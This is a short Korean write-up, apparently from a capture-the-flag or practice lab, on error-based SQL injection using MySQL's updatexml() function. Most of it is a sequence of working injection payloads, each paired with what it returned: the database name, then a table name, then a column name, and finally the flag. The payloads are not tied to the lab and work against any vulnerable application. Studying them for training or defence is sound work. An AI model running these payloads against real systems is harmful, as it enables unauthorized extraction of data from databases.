SQL 에러가 응답에 포함되는 경우 실행
에러를 발생시키면서 원하는 질의문을 실행하는 것이 목적
-논리 에러 V
-문법 에러
사용할 function 검색 -> updatexml()....
1' and updatexml(null,concat(0x3a,(select 'test')),null) and '1'='1
1' and updatexml(null,concat(0x3a,(select database())),null) and '1'='1
DB 이름 : sqli_2
1' and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema='sqli_2' limit 0,1)),null) and '1'='1
Table 이름 : flag_table
1' and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_name='flag_table' limit 0,1)),null) and '1'='1
Column 이름 : Flag
1' and updatexml(null,concat(0x3a,(select flag from flag_table)),null) and '1'='1